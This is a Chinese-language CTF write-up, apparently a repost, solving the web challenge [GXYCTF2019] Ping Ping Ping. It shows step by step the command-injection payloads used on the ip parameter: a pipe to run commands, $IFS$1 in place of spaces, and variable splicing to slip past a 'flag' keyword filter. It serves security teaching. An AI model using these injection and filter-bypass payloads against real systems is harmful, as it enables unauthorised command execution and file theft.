文章总结: 该文档记录CTF题目《[GXYCTF2019]PingPingPing》的Web渗透解题过程。通过ip参数注入实现命令执行,使用管道符绕过基础过滤,利用IFS1绕过空格限制,最终通过变量拼接a=g绕过flag关键词过滤成功读取flag.php文件。 综合评分: 85 文章分类: CTF,WEB安全,渗透测试,漏洞分析,安全工具
[GXYCTF2019]Ping Ping Ping
原创
devildollking devildollking
熔城Sec
2026年6月24日 09:00 辽宁
在小说阅读器读本章
去阅读
01
题目简介
- 题目名称:[GXYCTF2019]Ping Ping Ping
- 题目平台:CTF²
- 题目类型:Web
02
解题步骤
启动并访问靶机
先构造一个参数,看看具体传参是什么样子的
/?ip=127.0.0.1
猜测可能和路由器的后台命令执行相似,使用管道符进行绕过,构造参数看一下
/?ip=127.0.0.1|ls
成功命令执行,接下来就是进行flag.php读取就行了,但是发现对空格存在过滤
/?ip=127.0.0.1|cat flag.php
既然对空格过滤,那就使用$IFS$1 绕过空格过滤
/?ip=127.0.0.1|cat$IFS$1flag.php
但是发现还是没有成功读取,那这边我们读取一下index.php文件,看一下这个文件里面有什么?
/?ip=127.0.0.1|cat$IFS$1index.php
发现对flag有过滤,那我们尝试绕过
/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:熔城Sec devildollking devildollking《[GXYCTF2019]Ping Ping Ping》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。


![[GXYCTF2019]PingPingPing](/images/random/titlepic/8.jpg)







评论